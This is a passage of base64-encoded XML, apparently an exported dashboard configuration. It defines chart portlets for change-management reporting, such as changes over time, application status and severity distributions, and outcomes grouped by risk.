3ZmZlPC91dWlkPjxkZXNjcmlwdGlvbi8+PHRpbWVvdXQ+MjA8L3RpbWVvdXQ+PGRlZmF1bHRXaWR0aD4xPC9kZWZhdWx0V2lkdGg+PGVuYWJsZWQ+dHJ1ZTwvZW5hYmxlZD48ZXhwb3J0QXNXU1JQPnRydWU8L2V4cG9ydEFzV1NSUD48c3VwcG9ydERyaWxsVG8+dHJ1ZTwvc3VwcG9ydERyaWxsVG8+PHBvcnRsZXRDb21tU3VwPmZhbHNlPC9wb3J0bGV0Q29tbVN1cD48YnVpbHRJbj5mYWxzZTwvYnVpbHRJbj48ZGVwZW5kZW50VXVpZD41ODZkYzU4YWY0OWUyZjRlOmZmOTgwNToxMGE2MDgxMzAzNzotN2ZmYzwvZGVwZW5kZW50VXVpZD48L1BvcnRsZXREZWZpbml0aW9uPjxQb3J0bGV0RGVmaW5pdGlvbj48TGluZUNoYXJ0UG9ydGxldERlZmluaXRpb24+PENoYXJ0UG9ydGxldERlZmluaXRpb24+PEJ1aWxkZXJQb3J0bGV0RGVmaW5pdGlvbj48ZGF0YVNvdXJjZT48aWQ+Q0hBTkdFX09WRVJfVElNRV9EQVRBX1NPVVJDRTwvaWQ+PG5hbWU+Q2hhbmdlcyBPdmVyIFRpbWU8L25hbWU+PC9kYXRhU291cmNlPjxwcmVmZXJlbmNlU3VtbWFyeVNob3duPnRydWU8L3ByZWZlcmVuY2VTdW1tYXJ5U2hvd24+PHJlcXVpcmVFZGl0QmVmb3JlRmlyc3RWaWV3PmZhbHNlPC9yZXF1aXJlRWRpdEJlZm9yZUZpcnN0Vmlldz48aGVscFRleHQvPjxwcmVmZXJlbmNlPjxuYW1lPkZpbHRlcjwvbmFtZT48dHlwZT5kcm9wZG93bjwvdHlwZT48cHJvbXB0PkZpbHRlcjo8L3Byb21wdD48bGF5b3V0Um93PjA8L2xheW91dFJvdz48bGF5b3V0Q29sdW1uPjA8L2xheW91dENvbHVtbj48bGF5b3V0V2lkdGg+MTwvbGF5b3V0V2lkdGg+PGRlZmF1bHRWYWx1ZS8+PGRpc3BsYXlPcHRpb24+cmVxdWlyZWRFZGl0YWJsZVByZWY8L2Rpc3BsYXlPcHRpb24+PC9wcmVmZXJlbmNlPjxwcmVmZXJlbmNlPjxuYW1lPkdyb3VwIEJ5PC9uYW1lPjx0eXBlPmRyb3Bkb3duPC90eXBlPjxwcm9tcHQ+R3JvdXAgQnk6PC9wcm9tcHQ+PGxheW91dFJvdz4wPC9sYXlvdXRSb3c+PGxheW91dENvbHVtbj4xPC9sYXlvdXRDb2x1bW4+PGxheW91dFdpZHRoPjE8L2xheW91dFdpZHRoPjxkZWZhdWx0VmFsdWU+W3dlZWtdW1dlZWtdPC9kZWZhdWx0VmFsdWU+PGRpc3BsYXlPcHRpb24+cmVxdWlyZWRFZGl0YWJsZVByZWY8L2Rpc3BsYXlPcHRpb24+PC9wcmVmZXJlbmNlPjwvQnVpbGRlclBvcnRsZXREZWZpbml0aW9uPjxjaGFydFRpdGxlPkNoYW5nZXMgT3ZlciBUaW1lPC9jaGFydFRpdGxlPjxjb2xvclNvdXJjZS8+PHRvb2x0aXBTb3VyY2U+Q291bnQ8L3Rvb2x0aXBTb3VyY2U+PHRvb2x0aXBDb250YWluc0hUTUw+ZmFsc2U8L3Rvb2x0aXBDb250YWluc0hUTUw+PG9yaWVudGF0aW9uLz48aHlwZXJsaW5rPjxoeXBlcmxpbmtUeXBlPm5vSHlwZXJsaW5rPC9oeXBlcmxpbmtUeXBlPjxoeXBlcmxpbmtTb3VyY2UvPjwvaHlwZXJsaW5rPjwvQ2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48eEF4aXNTb3VyY2U+UGxhbm5pbmcgU3RhcnQgVGltZTwveEF4aXNTb3VyY2U+PHhBeGlzTGFiZWw+UGxhbm5pbmcgU3RhcnQgVGltZTwveEF4aXNMYWJlbD48eUF4aXNTb3VyY2U+Q291bnQ8L3lBeGlzU291cmNlPjx5QXhpc0xhYmVsPkNvdW50PC95QXhpc0xhYmVsPjxzZXJpZXNTb3VyY2U+TGluZSBMYWJlbDwvc2VyaWVzU291cmNlPjxzZXJpZXNMYWJlbD5DaGFuZ2VzPC9zZXJpZXNMYWJlbD48L0xpbmVDaGFydFBvcnRsZXREZWZpbml0aW9uPjx0eXBlPkxpbmVDaGFydDwvdHlwZT48bmFtZT5DaGFuZ2VzIE92ZXIgVGltZTwvbmFtZT48dXVpZD4zMjljODEyYzUxNzgzZTllOjZhOTUyMGYzOjExNjM5ODE3ZGEyOi03ZmVjPC91dWlkPjxkZXNjcmlwdGlvbi8+PHRpbWVvdXQ+MjA8L3RpbWVvdXQ+PGRlZmF1bHRXaWR0aD4xPC9kZWZhdWx0V2lkdGg+PGVuYWJsZWQ+dHJ1ZTwvZW5hYmxlZD48ZXhwb3J0QXNXU1JQPmZhbHNlPC9leHBvcnRBc1dTUlA+PHN1cHBvcnREcmlsbFRvPnRydWU8L3N1cHBvcnREcmlsbFRvPjxwb3J0bGV0Q29tbVN1cD5mYWxzZTwvcG9ydGxldENvbW1TdXA+PGJ1aWx0SW4+ZmFsc2U8L2J1aWx0SW4+PGRlcGVuZGVudFV1aWQ+NTg2ZGM1OGFmNDllMmY0ZTpmZjk4MDU6MTBhNjA4MTMwMzc6LTdmZmM8L2RlcGVuZGVudFV1aWQ+PC9Qb3J0bGV0RGVmaW5pdGlvbj48UG9ydGxldERlZmluaXRpb24+PE11bHRpQmFyQ2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48Q2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48QnVpbGRlclBvcnRsZXREZWZpbml0aW9uPjxkYXRhU291cmNlPjxpZD5BUFBMSUNBVElPTl9TVEFUVVNfRElTVFJJQlVUSU9OPC9pZD48bmFtZT5CdXNpbmVzcyBDSSBTdGF0dXMgRGlzdHJpYnV0aW9uPC9uYW1lPjwvZGF0YVNvdXJjZT48cHJlZmVyZW5jZVN1bW1hcnlTaG93bj50cnVlPC9wcmVmZXJlbmNlU3VtbWFyeVNob3duPjxyZXF1aXJlRWRpdEJlZm9yZUZpcnN0Vmlldz5mYWxzZTwvcmVxdWlyZUVkaXRCZWZvcmVGaXJzdFZpZXc+PGhlbHBUZXh0Lz48cHJlZmVyZW5jZT48bmFtZT5Vc2VyIEFwcGxpY2F0aW9uczwvbmFtZT48dHlwZT55ZXNObzwvdHlwZT48cHJvbXB0PlNob3cgT25seSBVc2VyIEFwcGxpY2F0aW9uczwvcHJvbXB0PjxsYXlvdXRSb3c+MDwvbGF5b3V0Um93PjxsYXlvdXRDb2x1bW4+MTwvbGF5b3V0Q29sdW1uPjxsYXlvdXRXaWR0aD4xPC9sYXlvdXRXaWR0aD48ZGVmYXVsdFZhbHVlPltZXVtZZXNdPC9kZWZhdWx0VmFsdWU+PGRpc3BsYXlPcHRpb24+ZWRpdGFibGVQcmVmPC9kaXNwbGF5T3B0aW9uPjwvcHJlZmVyZW5jZT48cHJlZmVyZW5jZT48bmFtZT5UaW1lIEZyYW1lPC9uYW1lPjx0eXBlPmRyb3Bkb3duPC90eXBlPjxwcm9tcHQ+Q3JlYXRlZCBXaXRoaW48L3Byb21wdD48bGF5b3V0Um93PjA8L2xheW91dFJvdz48bGF5b3V0Q29sdW1uPjA8L2xheW91dENvbHVtbj48bGF5b3V0V2lkdGg+MTwvbGF5b3V0V2lkdGg+PGRlZmF1bHRWYWx1ZT5bTGFzdCBNb250aF1bTGFzdCBNb250aF08L2RlZmF1bHRWYWx1ZT48ZGlzcGxheU9wdGlvbj5yZXF1aXJlZEVkaXRhYmxlUHJlZjwvZGlzcGxheU9wdGlvbj48L3ByZWZlcmVuY2U+PC9CdWlsZGVyUG9ydGxldERlZmluaXRpb24+PGNoYXJ0VGl0bGU+QXBwbGljYXRpb24gU3RhdHVzIERpc3RyaWJ1dGlvbjwvY2hhcnRUaXRsZT48Y29sb3JTb3VyY2UvPjx0b29sdGlwU291cmNlPiMgUmVxdWVzdHM8L3Rvb2x0aXBTb3VyY2U+PHRvb2x0aXBDb250YWluc0hUTUw+ZmFsc2U8L3Rvb2x0aXBDb250YWluc0hUTUw+PG9yaWVudGF0aW9uPnZlcnRpY2FsPC9vcmllbnRhdGlvbj48aHlwZXJsaW5rPjxoeXBlcmxpbmtUeXBlPm5vSHlwZXJsaW5rPC9oeXBlcmxpbmtUeXBlPjxoeXBlcmxpbmtTb3VyY2UvPjwvaHlwZXJsaW5rPjwvQ2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48YmFyTmFtZVNvdXJjZT5JbXBhY3RlZCBBcHBsaWNhdGlvbjwvYmFyTmFtZVNvdXJjZT48YmFyQXhpc0xhYmVsPkltcGFjdGVkIEFwcGxpY2F0aW9uPC9iYXJBeGlzTGFiZWw+PHZhbHVlU291cmNlPiMgUmVxdWVzdHM8L3ZhbHVlU291cmNlPjx2YWx1ZUF4aXNMYWJlbD4jIFJlcXVlc3RzPC92YWx1ZUF4aXNMYWJlbD48c2VyaWVzU291cmNlPlN0YXR1czwvc2VyaWVzU291cmNlPjxzZXJpZXNMYWJlbD5TdGF0dXM8L3Nlcmllc0xhYmVsPjwvTXVsdGlCYXJDaGFydFBvcnRsZXREZWZpbml0aW9uPjx0eXBlPkNsdXN0ZXJlZEJhckNoYXJ0PC90eXBlPjxuYW1lPkFwcGxpY2F0aW9uIFN0YXR1cyBEaXN0cmlidXRpb248L25hbWU+PHV1aWQ+NTg2ZGM1OGFmNDllMmY0ZTpmZjk4MDU6MTBhNjA4MTMwMzc6LTdmZmY8L3V1aWQ+PGRlc2NyaXB0aW9uLz48dGltZW91dD4yMDwvdGltZW91dD48ZGVmYXVsdFdpZHRoPjI8L2RlZmF1bHRXaWR0aD48ZW5hYmxlZD50cnVlPC9lbmFibGVkPjxleHBvcnRBc1dTUlA+dHJ1ZTwvZXhwb3J0QXNXU1JQPjxzdXBwb3J0RHJpbGxUbz50cnVlPC9zdXBwb3J0RHJpbGxUbz48cG9ydGxldENvbW1TdXA+ZmFsc2U8L3BvcnRsZXRDb21tU3VwPjxidWlsdEluPmZhbHNlPC9idWlsdEluPjxkZXBlbmRlbnRVdWlkPjU4NmRjNThhZjQ5ZTJmNGU6ZmY5ODA1OjEwYTYwODEzMDM3Oi03ZmZjPC9kZXBlbmRlbnRVdWlkPjwvUG9ydGxldERlZmluaXRpb24+PFBvcnRsZXREZWZpbml0aW9uPjxMaW5lQ2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48Q2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48QnVpbGRlclBvcnRsZXREZWZpbml0aW9uPjxkYXRhU291cmNlPjxpZD5DSEFOR0VfT1ZFUl9USU1FX0RBVEFfU09VUkNFPC9pZD48bmFtZT5DaGFuZ2VzIE92ZXIgVGltZTwvbmFtZT48L2RhdGFTb3VyY2U+PHByZWZlcmVuY2VTdW1tYXJ5U2hvd24+dHJ1ZTwvcHJlZmVyZW5jZVN1bW1hcnlTaG93bj48cmVxdWlyZUVkaXRCZWZvcmVGaXJzdFZpZXc+ZmFsc2U8L3JlcXVpcmVFZGl0QmVmb3JlRmlyc3RWaWV3PjxoZWxwVGV4dC8+PHByZWZlcmVuY2U+PG5hbWU+R3JvdXAgQnk8L25hbWU+PHR5cGU+ZHJvcGRvd248L3R5cGU+PHByb21wdD5Hcm91cCBCeTo8L3Byb21wdD48bGF5b3V0Um93PjA8L2xheW91dFJvdz48bGF5b3V0Q29sdW1uPjE8L2xheW91dENvbHVtbj48bGF5b3V0V2lkdGg+MTwvbGF5b3V0V2lkdGg+PGRlZmF1bHRWYWx1ZT5bd2Vla11bV2Vla108L2RlZmF1bHRWYWx1ZT48ZGlzcGxheU9wdGlvbj5yZXF1aXJlZEVkaXRhYmxlUHJlZjwvZGlzcGxheU9wdGlvbj48L3ByZWZlcmVuY2U+PHByZWZlcmVuY2U+PG5hbWU+RmlsdGVyPC9uYW1lPjx0eXBlPmRyb3Bkb3duPC90eXBlPjxwcm9tcHQ+RmlsdGVyOjwvcHJvbXB0PjxsYXlvdXRSb3c+MDwvbGF5b3V0Um93PjxsYXlvdXRDb2x1bW4+MDwvbGF5b3V0Q29sdW1uPjxsYXlvdXRXaWR0aD4xPC9sYXlvdXRXaWR0aD48ZGVmYXVsdFZhbHVlPlsyOTQ5MThdW0xhdGVudF08L2RlZmF1bHRWYWx1ZT48ZGlzcGxheU9wdGlvbj5yZXF1aXJlZEVkaXRhYmxlUHJlZjwvZGlzcGxheU9wdGlvbj48L3ByZWZlcmVuY2U+PC9CdWlsZGVyUG9ydGxldERlZmluaXRpb24+PGNoYXJ0VGl0bGU+TGF0ZW50IENoYW5nZXMgT3ZlciBUaW1lPC9jaGFydFRpdGxlPjxjb2xvclNvdXJjZS8+PHRvb2x0aXBTb3VyY2U+Q291bnQ8L3Rvb2x0aXBTb3VyY2U+PHRvb2x0aXBDb250YWluc0hUTUw+ZmFsc2U8L3Rvb2x0aXBDb250YWluc0hUTUw+PG9yaWVudGF0aW9uLz48aHlwZXJsaW5rPjxoeXBlcmxpbmtUeXBlPm5vSHlwZXJsaW5rPC9oeXBlcmxpbmtUeXBlPjxoeXBlcmxpbmtTb3VyY2UvPjwvaHlwZXJsaW5rPjwvQ2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48eEF4aXNTb3VyY2U+UGxhbm5pbmcgU3RhcnQgVGltZTwveEF4aXNTb3VyY2U+PHhBeGlzTGFiZWw+UGxhbm5pbmcgU3RhcnQgVGltZTwveEF4aXNMYWJlbD48eUF4aXNTb3VyY2U+Q291bnQ8L3lBeGlzU291cmNlPjx5QXhpc0xhYmVsPkNvdW50PC95QXhpc0xhYmVsPjxzZXJpZXNTb3VyY2U+TGluZSBMYWJlbDwvc2VyaWVzU291cmNlPjxzZXJpZXNMYWJlbD5MYXRlbnQgQ2hhbmdlczwvc2VyaWVzTGFiZWw+PC9MaW5lQ2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48dHlwZT5MaW5lQ2hhcnQ8L3R5cGU+PG5hbWU+TGF0ZW50IENoYW5nZXMgT3ZlciBUaW1lPC9uYW1lPjx1dWlkPjNiN2JiNmFhMDI5NzdmNWM6Njk0MDIxMGI6MTE2M2JjYjM5NGE6LTdmZGY8L3V1aWQ+PGRlc2NyaXB0aW9uLz48dGltZW91dD4yMDwvdGltZW91dD48ZGVmYXVsdFdpZHRoPjE8L2RlZmF1bHRXaWR0aD48ZW5hYmxlZD50cnVlPC9lbmFibGVkPjxleHBvcnRBc1dTUlA+ZmFsc2U8L2V4cG9ydEFzV1NSUD48c3VwcG9ydERyaWxsVG8+dHJ1ZTwvc3VwcG9ydERyaWxsVG8+PHBvcnRsZXRDb21tU3VwPmZhbHNlPC9wb3J0bGV0Q29tbVN1cD48YnVpbHRJbj5mYWxzZTwvYnVpbHRJbj48ZGVwZW5kZW50VXVpZD41ODZkYzU4YWY0OWUyZjRlOmZmOTgwNToxMGE2MDgxMzAzNzotN2ZmYzwvZGVwZW5kZW50VXVpZD48L1BvcnRsZXREZWZpbml0aW9uPjxQb3J0bGV0RGVmaW5pdGlvbj48TXVsdGlCYXJDaGFydFBvcnRsZXREZWZpbml0aW9uPjxDaGFydFBvcnRsZXREZWZpbml0aW9uPjxCdWlsZGVyUG9ydGxldERlZmluaXRpb24+PGRhdGFTb3VyY2U+PGlkPk9VVENPTUVfR1JPVVBCWV9OVU1FUklDX0ZJRUxEX0RBVEFfU09VUkNFPC9pZD48bmFtZT5PdXRjb21lIEdyb3VwIGJ5IE51bWVyaWMgRmllbGQ8L25hbWU+PC9kYXRhU291cmNlPjxwcmVmZXJlbmNlU3VtbWFyeVNob3duPnRydWU8L3ByZWZlcmVuY2VTdW1tYXJ5U2hvd24+PHJlcXVpcmVFZGl0QmVmb3JlRmlyc3RWaWV3PmZhbHNlPC9yZXF1aXJlRWRpdEJlZm9yZUZpcnN0Vmlldz48aGVscFRleHQvPjxwcmVmZXJlbmNlPjxuYW1lPk1heGltdW0gVmFsdWU8L25hbWU+PHR5cGU+dGV4dDwvdHlwZT48cHJvbXB0Pk1heGltdW0gVmFsdWU6PC9wcm9tcHQ+PGxheW91dFJvdz4zPC9sYXlvdXRSb3c+PGxheW91dENvbHVtbj4wPC9sYXlvdXRDb2x1bW4+PGxheW91dFdpZHRoPjI8L2xheW91dFdpZHRoPjxkZWZhdWx0VmFsdWU+WzEwMF1bXTwvZGVmYXVsdFZhbHVlPjxkaXNwbGF5T3B0aW9uPnJlcXVpcmVkRWRpdGFibGVQcmVmPC9kaXNwbGF5T3B0aW9uPjwvcHJlZmVyZW5jZT48cHJlZmVyZW5jZT48bmFtZT5NaW5pbXVuIFZhbHVlPC9uYW1lPjx0eXBlPnRleHQ8L3R5cGU+PHByb21wdD5NaW5pbXVuIFZhbHVlOjwvcHJvbXB0PjxsYXlvdXRSb3c+MjwvbGF5b3V0Um93PjxsYXlvdXRDb2x1bW4+MDwvbGF5b3V0Q29sdW1uPjxsYXlvdXRXaWR0aD4yPC9sYXlvdXRXaWR0aD48ZGVmYXVsdFZhbHVlPlswXVtdPC9kZWZhdWx0VmFsdWU+PGRpc3BsYXlPcHRpb24+cmVxdWlyZWRFZGl0YWJsZVByZWY8L2Rpc3BsYXlPcHRpb24+PC9wcmVmZXJlbmNlPjxwcmVmZXJlbmNlPjxuYW1lPkludGVydmFsPC9uYW1lPjx0eXBlPnRleHQ8L3R5cGU+PHByb21wdD5JbnRlcnZhbDo8L3Byb21wdD48bGF5b3V0Um93PjQ8L2xheW91dFJvdz48bGF5b3V0Q29sdW1uPjA8L2xheW91dENvbHVtbj48bGF5b3V0V2lkdGg+MjwvbGF5b3V0V2lkdGg+PGRlZmF1bHRWYWx1ZT5bMTBdW108L2RlZmF1bHRWYWx1ZT48ZGlzcGxheU9wdGlvbj5yZXF1aXJlZEVkaXRhYmxlUHJlZjwvZGlzcGxheU9wdGlvbj48L3ByZWZlcmVuY2U+PHByZWZlcmVuY2U+PG5hbWU+RmlsdGVyPC9uYW1lPjx0eXBlPmRyb3Bkb3duPC90eXBlPjxwcm9tcHQ+RmlsdGVyOjwvcHJvbXB0PjxsYXlvdXRSb3c+MDwvbGF5b3V0Um93PjxsYXlvdXRDb2x1bW4+MDwvbGF5b3V0Q29sdW1uPjxsYXlvdXRXaWR0aD4yPC9sYXlvdXRXaWR0aD48ZGVmYXVsdFZhbHVlLz48ZGlzcGxheU9wdGlvbj5yZXF1aXJlZEVkaXRhYmxlUHJlZjwvZGlzcGxheU9wdGlvbj48L3ByZWZlcmVuY2U+PHByZWZlcmVuY2U+PG5hbWU+TnVtZXJpYyBUeXBlPC9uYW1lPjx0eXBlPmRyb3Bkb3duPC90eXBlPjxwcm9tcHQ+TnVtZXJpYyBUeXBlOjwvcHJvbXB0PjxsYXlvdXRSb3c+MTwvbGF5b3V0Um93PjxsYXlvdXRDb2x1bW4+MDwvbGF5b3V0Q29sdW1uPjxsYXlvdXRXaWR0aD4yPC9sYXlvdXRXaWR0aD48ZGVmYXVsdFZhbHVlPltjYWxjdWxhdGVkLXJpc2tdW2NhbGN1bGF0ZWQtcmlza108L2RlZmF1bHRWYWx1ZT48ZGlzcGxheU9wdGlvbj5yZXF1aXJlZEVkaXRhYmxlUHJlZjwvZGlzcGxheU9wdGlvbj48L3ByZWZlcmVuY2U+PC9CdWlsZGVyUG9ydGxldERlZmluaXRpb24+PGNoYXJ0VGl0bGU+T3V0Y29tZSBHcm91cCBCeSBSaXNrPC9jaGFydFRpdGxlPjxjb2xvclNvdXJjZT5Db2xvcjwvY29sb3JTb3VyY2U+PHRvb2x0aXBTb3VyY2U+VG9vbHRpcDwvdG9vbHRpcFNvdXJjZT48dG9vbHRpcENvbnRhaW5zSFRNTD5mYWxzZTwvdG9vbHRpcENvbnRhaW5zSFRNTD48b3JpZW50YXRpb24+dmVydGljYWw8L29yaWVudGF0aW9uPjxoeXBlcmxpbms+PGh5cGVybGlua1R5cGU+bm9IeXBlcmxpbms8L2h5cGVybGlua1R5cGU+PGh5cGVybGlua1NvdXJjZS8+PC9oeXBlcmxpbms+PC9DaGFydFBvcnRsZXREZWZpbml0aW9uPjxiYXJOYW1lU291cmNlPkZpZWxkPC9iYXJOYW1lU291cmNlPjxiYXJBeGlzTGFiZWw+UmlzazwvYmFyQXhpc0xhYmVsPjx2YWx1ZVNvdXJjZT5QZXJjZW50YWdlPC92YWx1ZVNvdXJjZT48dmFsdWVBeGlzTGFiZWw+UGVyY2VudGFnZTwvdmFsdWVBeGlzTGFiZWw+PHNlcmllc1NvdXJjZT5PdXRjb21lPC9zZXJpZXNTb3VyY2U+PHNlcmllc0xhYmVsPk91dGNvbWU8L3Nlcmllc0xhYmVsPjwvTXVsdGlCYXJDaGFydFBvcnRsZXREZWZpbml0aW9uPjx0eXBlPkNsdXN0ZXJlZEJhckNoYXJ0PC90eXBlPjxuYW1lPk91dGNvbWUgR3JvdXBlZCBCeSBSaXNrPC9uYW1lPjx1dWlkPjZhMzY3M2M5ZmViNzZkY2I6LTUxOTcwOGNjOjExNzJiYTU3OWVkOi03ZmYxPC91dWlkPjxkZXNjcmlwdGlvbi8+PHRpbWVvdXQ+MjA8L3RpbWVvdXQ+PGRlZmF1bHRXaWR0aD4xPC9kZWZhdWx0V2lkdGg+PGVuYWJsZWQ+dHJ1ZTwvZW5hYmxlZD48ZXhwb3J0QXNXU1JQPmZhbHNlPC9leHBvcnRBc1dTUlA+PHN1cHBvcnREcmlsbFRvPnRydWU8L3N1cHBvcnREcmlsbFRvPjxwb3J0bGV0Q29tbVN1cD5mYWxzZTwvcG9ydGxldENvbW1TdXA+PGJ1aWx0SW4+ZmFsc2U8L2J1aWx0SW4+PGRlcGVuZGVudFV1aWQ+NTg2ZGM1OGFmNDllMmY0ZTpmZjk4MDU6MTBhNjA4MTMwMzc6LTdmZmM8L2RlcGVuZGVudFV1aWQ+PC9Qb3J0bGV0RGVmaW5pdGlvbj48UG9ydGxldERlZmluaXRpb24+PE11bHRpQmFyQ2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48Q2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48QnVpbGRlclBvcnRsZXREZWZpbml0aW9uPjxkYXRhU291cmNlPjxpZD5BUFBMSUNBVElPTl9TRVZFUklUWV9ESVNUUklCVVRJT048L2lkPjxuYW1lPkJ1c2luZXNzIENJIFNldmVyaXR5IERpc3RyaWJ1dGlvbjwvbmFtZT48L2RhdGFTb3VyY2U+PHByZWZlcmVuY2VTdW1tYXJ5U2hvd24+dHJ1ZTwvcHJlZmVyZW5jZVN1bW1hcnlTaG93bj48cmVxdWlyZUVkaXRCZWZvcmVGaXJzdFZpZXc+ZmFsc2U8L3JlcXVpcmVFZGl0QmVmb3JlRmlyc3RWaWV3PjxoZWxwVGV4dC8+PHByZWZlcmVuY2U+PG5hbWU+VXNlciBBcHBsaWNhdGlvbnM8L25hbWU+PHR5cGU+eWVzTm88L3R5cGU+PHByb21wdD5TaG93IE9ubHkgVXNlciBBcHBsaWNhdGlvbnM8L3Byb21wdD48bGF5b3V0Um93PjA8L2xheW91dFJvdz48bGF5b3V0Q29sdW1uPjA8L2xheW91dENvbHVtbj48bGF5b3V0V2lkdGg+MTwvbGF5b3V0V2lkdGg+PGRlZmF1bHRWYWx1ZT5bWV1bWWVzXTwvZGVmYXVsdFZhbHVlPjxkaXNwbGF5T3B0aW9uPmVkaXRhYmxlUHJlZjwvZGlzcGxheU9wdGlvbj48L3ByZWZlcmVuY2U+PHByZWZlcmVuY2U+PG5hbWU+UmVxdWVzdCBTdGF0dXM8L25hbWU+PHR5cGU+ZHJvcGRvd248L3R5cGU+PHByb21wdD5SZXF1ZXN0IFN0YXR1czwvcHJvbXB0PjxsYXlvdXRSb3c+MDwvbGF5b3V0Um93PjxsYXlvdXRDb2x1bW4+MTwvbGF5b3V0Q29sdW1uPjxsYXlvdXRXaWR0aD4xPC9sYXlvdXRXaWR0aD48ZGVmYXVsdFZhbHVlPltQRU5ESU5HX0FQUFJPVkFMXVtQZW5kaW5nCgkJCQkJCQlBcHByb3ZhbF08L2RlZmF1bHRWYWx1ZT48ZGlzcGxheU9wdGlvbj5yZXF1aXJlZEVkaXRhYmxlUHJlZjwvZGlzcGxheU9wdGlvbj48L3ByZWZlcmVuY2U+PC9CdWlsZGVyUG9ydGxldERlZmluaXRpb24+PGNoYXJ0VGl0bGU+QXBwbGljYXRpb24gU2V2ZXJpdHkgRGlzdHJpYnV0aW9uPC9jaGFydFRpdGxlPjxjb2xvclNvdXJjZT5TZXZlcml0eSBDb2xvcnM8L2NvbG9yU291cmNlPjx0b29sdGlwU291cmNlPiMgUmVxdWVzdHM8L3Rvb2x0aXBTb3VyY2U+PHRvb2x0aXBDb250YWluc0hUTUw+ZmFsc2U8L3Rvb2x0aXBDb250YWluc0hUTUw+PG9yaWVudGF0aW9uPnZlcnRpY2FsPC9vcmllbnRhdGlvbj48aHlwZXJsaW5rPjxoeXBlcmxpbmtUeXBlPm5vSHlwZXJsaW5rPC9oeXBlcmxpbmtUeXBlPjxoeXBlcmxpbmtTb3VyY2UvPjwvaHlwZXJsaW5rPjwvQ2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48YmFyTmFtZVNvdXJjZT5JbXBhY3RlZCBBcHBsaWNhdGlvbjwvYmFyTmFtZVNvdXJjZT48YmFyQXhpc0xhYmVsPkltcGFjdGVkIEFwcGxpY2F0aW9uPC9iYXJBeGlzTGFiZWw+PHZhbHVlU291cmNlPiMgUmVxdWVzdHM8L3ZhbHVlU291cmNlPjx2YWx1ZUF4aXNMYWJlbD4jIFJlcXVlc3RzPC92YWx1ZUF4aXNMYWJlbD48c2VyaWVzU291cmNlPlNldmVyaXR5PC9zZXJpZXNTb3VyY2U+PHNlcmllc0xhYmVsPlNldmVyaXR5PC9zZXJpZXNMYWJlbD48L011bHRpQmFyQ2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48dHlwZT5DbHVzdGVyZWRCYXJDaGFydDwvdHlwZT48bmFtZT5BcHBsaWNhdGlvbiBTZXZlcml0eSBEaXN0cmlidXRpb248L25hbWU+PHV1aWQ+NTg2ZGM1OGFmNDllMmY0ZTpmZjk4MDU6MTBhNjA4MTMwMzc6LTgwMDA8L3V1aWQ+PGRlc2NyaXB0aW9uLz48dGltZW91dD4yMDwvdGltZW91dD48ZGVmYXVsdFdpZHRoPjI8L2RlZmF1bHRXaWR0aD48ZW5hYmxlZD50cnVlPC9lbmFibGVkPjxleHBvcnRBc1dTUlA+dHJ1ZTwvZXhwb3J0QXNXU1JQPjxzdXBwb3J0RHJpbGxUbz50cnVlPC9zdXBwb3J0RHJpbGxUbz48cG9ydGxldENvbW1TdXA+ZmFsc2U8L3BvcnRsZXRDb21tU3VwPjxidWlsdEluPmZhbHNlPC9idWlsdEluPjxkZXBlbmRlbnRVdWlkPjU4NmRjNThhZjQ5ZTJmNGU6ZmY5ODA1OjEwYTYwODEzMDM3Oi03ZmZjPC9kZXBlbmRlbnRVdWlkPjwvUG9ydGxldERlZmluaXRpb24+PFBvcnRsZXREZWZpbml0aW9uPjxMaW5lQ2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48Q2hhcnRQb3J0bGV0RGVmaW5pdGlvbj48QnVpbGRlclBvcnRsZXREZWZpbml0aW9uPjxkYXRhU291cmNlPjxpZD5BQk5PUk1BTF9DSEFOR0VfT1ZFUl9USU1FX0RBVEFfU09VUkNFPC9pZD48bmFtZT5BYm5vcm1hbCBDaGFuZ2VzIE92ZXIgVGltZTwvbmFtZT48L2RhdGFTb3VyY2U+PHByZWZlcmVuY2VTdW1tYXJ5U2hvd24+dHJ1ZTwvcHJlZmVyZW5jZVN1bW1hcnlTaG93bj48cmVxdWlyZUVkaXRCZWZvcmVGaXJzdFZpZXc+ZmFsc2U8L3JlcXVpcmVFZGl0QmVmb3JlRmlyc3RWaWV3PjxoZWxwVGV4dC8+PHByZWZlcmVuY2U+PG5hbWU+R3JvdXAgQnk8L25hbWU+PHR5cGU+ZHJvcGRvd248L3R5cGU+PHByb21wdD5Hcm91cCBCeTo8L3Byb21wdD48bGF5b3V0Um93PjA8L2xheW91dFJvdz48bGF5b3V0Q29sdW1uPjE8L2xheW91dENvbHVtbj48bGF5b3V0V2lkdGg+MTwvbGF5b3V0V2lkdGg+PGRlZmF1bHRWYWx1ZT5bd2Vla11bV2Vla108L2RlZmF1bHRWYWx1ZT48ZGlzcGxheU9wdGlvbj5yZXF1aXJlZEVkaXRhYmxlUHJlZjwvZGlzcGxheU9wdGlvbj48L3ByZWZlcmVuY2U+PHByZWZlcmVuY2U+PG5hbWU+RmlsdGVyPC9uYW1lPjx0eXBlPmRyb3Bkb3duPC90eXBlPjxwcm9tcHQ+RmlsdGVyOjwvcHJvbXB0PjxsYXlvdXRSb3c+MDwvbGF5b3V0Um93PjxsYXlvdXRDb2x1bW4+MDwvbGF5b3V0Q29sdW1uPjxsYXlvdXRXaWR0aD4xPC9sYXlvdXRXaWR0aD48ZGVmYXVsdFZhbHVlLz48ZGlzcGxheU9wdGlvbj5yZXF1aXJlZEVkaXRhYmxlUHJlZjwvZGlzcGxheU9wdGlvbj48L3ByZWZlcmVuY2U+PC9CdWlsZGVyUG9ydGxldERlZmluaXRpb24+PGNoYXJ0VGl0bGU+QWJub3JtYWwgQ2hhbmdlcyBPdmVyIFRpbWU8L2NoYXJ0VGl0bGU+PGNvbG9yU291cmNlLz48dG9vbHRpcFNvdXJjZT5Db3VudDwvdG9vbHRpcFNvdXJjZT48dG9vbHRpcENvbnRhaW5zSFRNTD5mYWxzZTwvdG9vbHRpcENvbnRhaW5zSFRNTD48b3JpZW50YXRpb24vPjxoeXB